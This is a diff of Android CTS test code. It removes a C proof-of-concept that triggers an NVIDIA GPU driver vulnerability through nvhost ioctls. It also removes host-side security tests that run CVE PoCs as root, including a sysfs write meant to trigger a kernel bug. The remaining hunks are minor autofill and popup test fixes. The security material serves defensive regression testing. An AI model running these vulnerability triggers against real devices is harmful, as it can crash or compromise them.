-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sched.h>
-#include <sys/types.h>
-#include <signal.h>
-#include <unistd.h>
-// for syscall
-#include <sys/syscall.h>
-// for futex
-#include <linux/futex.h>
-#include <sys/time.h>
-
-#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
-#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
-
-#define NVMAP_IOC_MAGIC 'N'
-struct nvmap_create_handle {
- union {
- __u32 id; /* FromId */
- __u32 size; /* CreateHandle */
- __s32 fd; /* DmaBufFd or FromFd */
- };
- __u32 handle; /* returns nvmap handle */
-};
-#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
-
-struct nvmap_alloc_handle {
- __u32 handle; /* nvmap handle */
- __u32 heap_mask; /* heaps to allocate from */
- __u32 flags; /* wb/wc/uc/iwb etc. */
- __u32 align; /* min alignment necessary */
-};
-#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
-
-static int set_affinity(int num)
-{
- int ret = 0;
- cpu_set_t mask;
- CPU_ZERO(&mask);
- CPU_SET(num, &mask);
- ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
- return ret;
-}
-
-#define SZ_128K 0x00020000
-#define NVHOST_AS_IOCTL_MAGIC 'A'
-struct nvhost_as_bind_channel_args {
- __u32 channel_fd; /* in */
-} __packed;
-#define NVHOST_AS_IOCTL_BIND_CHANNEL \
- _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
-
-struct nvhost_as_free_space_args {
- __u64 offset; /* in, byte address */
- __u32 pages; /* in, pages */
- __u32 page_size; /* in, bytes */
-};
-#define NVHOST_AS_IOCTL_FREE_SPACE \
- _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
-
-#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
-struct nvhost_as_alloc_space_args {
- __u32 pages; /* in, pages */
- __u32 page_size; /* in, bytes */
- __u32 flags; /* in */
- __u32 padding; /* in */
- union {
- __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
- __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
- } o_a;
-};
-#define NVHOST_AS_IOCTL_ALLOC_SPACE \
- _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
-
-#define CLOSE_THREAD_NUM 1
-#define TRY_TIMES 2
-#define NVMAPDEV "/dev/nvmap"
-#define GPUDEV "/dev/nvhost-gpu"
-#define ASDEV "/dev/nvhost-as-gpu"
-pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
-int nvmap, gpu, asgpu;
-volatile int attack;
-
-int main(void)
-{
- int i, j, ret;
- int dma1, dma2;
- struct nvmap_create_handle args = {
- .size = PAGE_SIZE
- };
- struct nvhost_as_bind_channel_args as_bind = { 0 };
- struct nvhost_as_alloc_space_args alloc = {
- .pages = 1,
- .page_size = SZ_128K,
- .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
- };
- struct nvhost_as_free_space_args free_arg = {
- .pages = 1,
- .page_size = SZ_128K
- };
-
- /* bind_cpu */
- set_affinity(0);
-
- nvmap = open(NVMAPDEV, O_RDONLY);
- if(nvmap == -1) {
- ERR("[-] open %s failed", NVMAPDEV);
- goto __cleanup;
- }
- gpu = open(GPUDEV, O_RDONLY);
- if(gpu == -1) {
- ERR("[-] open %s failed", GPUDEV);
- goto __cleanup;
- }
- asgpu = open(ASDEV, O_RDONLY);
- if(asgpu == -1) {
- ERR("[-] open %s failed", ASDEV);
- goto __cleanup;
- }
- // bind the channel
- as_bind.channel_fd = gpu;
- ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
- if(ret == -1) {
- ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
- goto __cleanup;
- } else {
- //LOG("[+] ioctl OK, channel is bond");
- }
-
- #if 1
- // prepare
- ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
- if(ret) {
- ERR("[-] NVMAP_IOC_CREATE failed");
- goto __cleanup;
- }
- #endif
-
- ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
- if(ret) {
- ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
- goto __cleanup;
- }
- free_arg.offset = alloc.o_a.offset;
- ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
- if(ret) {
- ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
- goto __cleanup;
- }
-
-__cleanup:
- close(nvmap);
- close(gpu);
- close(asgpu);
- return 0;
-}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
index 7e24e8f..1592182 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -139,73 +139,6 @@
}
/**
- * b/32700935
- */
- @SecurityTest
- public void testPocCVE_2016_8435() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
- }
- }
-
- /**
- * b/31568617
- */
- @SecurityTest
- public void testPocCVE_2016_9120() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/ion")) {
- AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
- }
- }
-
- //Highs
- /**
- * b/31225246
- */
- @SecurityTest
- public void testPocCVE_2016_8412() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
- AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
- }
- }
-
- /**
- * b/31243641
- */
- @SecurityTest
- public void testPocCVE_2016_8444() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
- AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
- }
- }
-
- /**
- * b/31791148
- */
- @SecurityTest
- public void testPocCVE_2016_8448() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
- AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
- }
- }
-
- /**
- * b/31798848
- */
- @SecurityTest
- public void testPocCVE_2016_8449() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
- AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
- }
- }
-
- /**
* b/31668540
*/
@SecurityTest
@@ -217,37 +150,6 @@
}
/**
- * b/32402548
- */
- @SecurityTest
- public void testPocCVE_2017_0403() throws Exception {
- enableAdbRoot(getDevice());
- AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
- }
-
- /**
- * b/32510733
- */
- @SecurityTest
- public void testPocCVE_2017_0404() throws Exception {
- enableAdbRoot(getDevice());
- if(containsDriver(getDevice(), "/proc/asound/version")) {
- AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
- }
- }
-
- /**
- * b/32178033
- */
- @SecurityTest
- public void testPocCVE_2016_8451() throws Exception {
- enableAdbRoot(getDevice());
- String command =
- "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
- AdbUtils.runCommandLine(command, getDevice());
- }
-
- /**
* b/32659848
*/
@SecurityTest
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
index 18bfb16..4fd98b7 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -30,47 +30,4 @@
AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
}
}
-
- /**
- * b/32636619
- */
- @SecurityTest
- public void testPocCVE_2017_0429() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
- enableAdbRoot(getDevice());
- AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
- }
- }
-
- /**
- * b/32219121
- */
- @SecurityTest
- public void testPocCVE_2016_8455() throws Exception {
- enableAdbRoot(getDevice());
- AdbUtils.runPoc("CVE-2016-8455", getDevice(), 60);
- }
-
- /**
- * b/32219255
- */
- @SecurityTest
- public void testPocCVE_2016_8456() throws Exception {
- enableAdbRoot(getDevice());
- AdbUtils.runPoc("CVE-2016-8456", getDevice(), 60);
- // CTS begins the next test before device finishes rebooting,
- // sleep to allow time for device to reboot.
- Thread.sleep(60000);
- }
-
- /**
- * b/32219453
- */
- @SecurityTest
- public void testPocCVE_2016_8457() throws Exception {
- enableAdbRoot(getDevice());
- AdbUtils.runPoc("CVE-2016-8457", getDevice(), 60);
- // Device takes up to 60 seconds to crash after PoC run.
- Thread.sleep(60000);
- }
- }
+}
diff --git a/tests/autofillservice/src/android/autofillservice/cts/Helper.java b/tests/autofillservice/src/android/autofillservice/cts/Helper.java
index 0abedf0..c2f22fb 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/Helper.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/Helper.java
@@ -114,6 +114,16 @@
static final int UI_TIMEOUT_MS = 2000;
/**
+ * Timeout (in milliseconds) for showing the autofill dataset picker UI.
+ *
+ * <p>The value is usually higher than {@link #UI_TIMEOUT_MS} because the performance of the
+ * dataset picker UI can be affect by external factors in some low-level devices.
+ *
+ * <p>Typically used by {@link UiBot}.
+ */
+ static final int UI_DATASET_PICKER_TIMEOUT_MS = 4000;
+
+ /**
* Timeout (in milliseconds) for an activity to be brought out to top.
*/
static final int ACTIVITY_RESURRECTION_MS = 5000;
diff --git a/tests/autofillservice/src/android/autofillservice/cts/UiBot.java b/tests/autofillservice/src/android/autofillservice/cts/UiBot.java
index fcb4e30..08740c8 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/UiBot.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/UiBot.java
@@ -18,6 +18,7 @@
import static android.autofillservice.cts.Helper.NOT_SHOWING_TIMEOUT_MS;
import static android.autofillservice.cts.Helper.SAVE_TIMEOUT_MS;
+import static android.autofillservice.cts.Helper.UI_DATASET_PICKER_TIMEOUT_MS;
import static android.autofillservice.cts.Helper.UI_TIMEOUT_MS;
import static android.service.autofill.SaveInfo.SAVE_DATA_TYPE_ADDRESS;
import static android.service.autofill.SaveInfo.SAVE_DATA_TYPE_CREDIT_CARD;
@@ -119,7 +120,7 @@
* @return the dataset picker object.
*/
UiObject2 assertDatasets(String...names) {
- final UiObject2 picker = findDatasetPicker();
+ final UiObject2 picker = findDatasetPicker(UI_DATASET_PICKER_TIMEOUT_MS);
assertWithMessage("wrong dataset names").that(getChildrenAsText(picker))
.containsExactlyElementsIn(Arrays.asList(names));
return picker;
@@ -148,7 +149,7 @@
* Selects a dataset that should be visible in the floating UI.
*/
void selectDataset(String name) {
- final UiObject2 picker = findDatasetPicker();
+ final UiObject2 picker = findDatasetPicker(UI_DATASET_PICKER_TIMEOUT_MS);
selectDataset(picker, name);
}
@@ -405,7 +406,7 @@
}
final String negativeButtonText = (negativeButtonStyle
- == SaveInfo.NEGATIVE_BUTTON_STYLE_REJECT) ? "NOT NOW" : "NO THANKS";
+ == SaveInfo.NEGATIVE_BUTTON_STYLE_REJECT) ? "Not now" : "No thanks";
UiObject2 negativeButton = snackbar.findObject(By.text(negativeButtonText));
assertWithMessage("negative button (%s)", negativeButtonText)
.that(negativeButton).isNotNull();
@@ -578,10 +579,6 @@
selector, UI_TIMEOUT_MS);
}
- private UiObject2 findDatasetPicker() {
- return findDatasetPicker(UI_TIMEOUT_MS);
- }
-
private UiObject2 findDatasetPicker(long timeout) {
final UiObject2 picker = waitForObject(By.res("android", RESOURCE_ID_DATASET_PICKER),
timeout);
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index d898fb5..966fe19 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -47,6 +47,7 @@
import android.transition.Transition.TransitionListener;
import android.transition.TransitionValues;
import android.util.AttributeSet;
+import android.util.DisplayMetrics;
import android.view.Display;
import android.view.Gravity;
import android.view.MotionEvent;
@@ -1429,6 +1430,16 @@
@Test
public void testAnchorInPopup() throws Throwable {
+ DisplayMetrics displayMetrics = mActivity.getResources().getDisplayMetrics();
+ float dpWidth = displayMetrics.widthPixels / displayMetrics.density;
+ float dpHeight = displayMetrics.heightPixels / displayMetrics.density;
+ final int minDisplaySize = 320;
+ if (dpWidth < minDisplaySize || dpHeight < minDisplaySize) {
+ // On smaller screens the popups that this test is creating
+ // are not guaranteed to be properly aligned to their anchors.
+ return;
+ }
+
mPopupWindow = createPopupWindow(
mActivity.getLayoutInflater().inflate(R.layout.popup_window, null));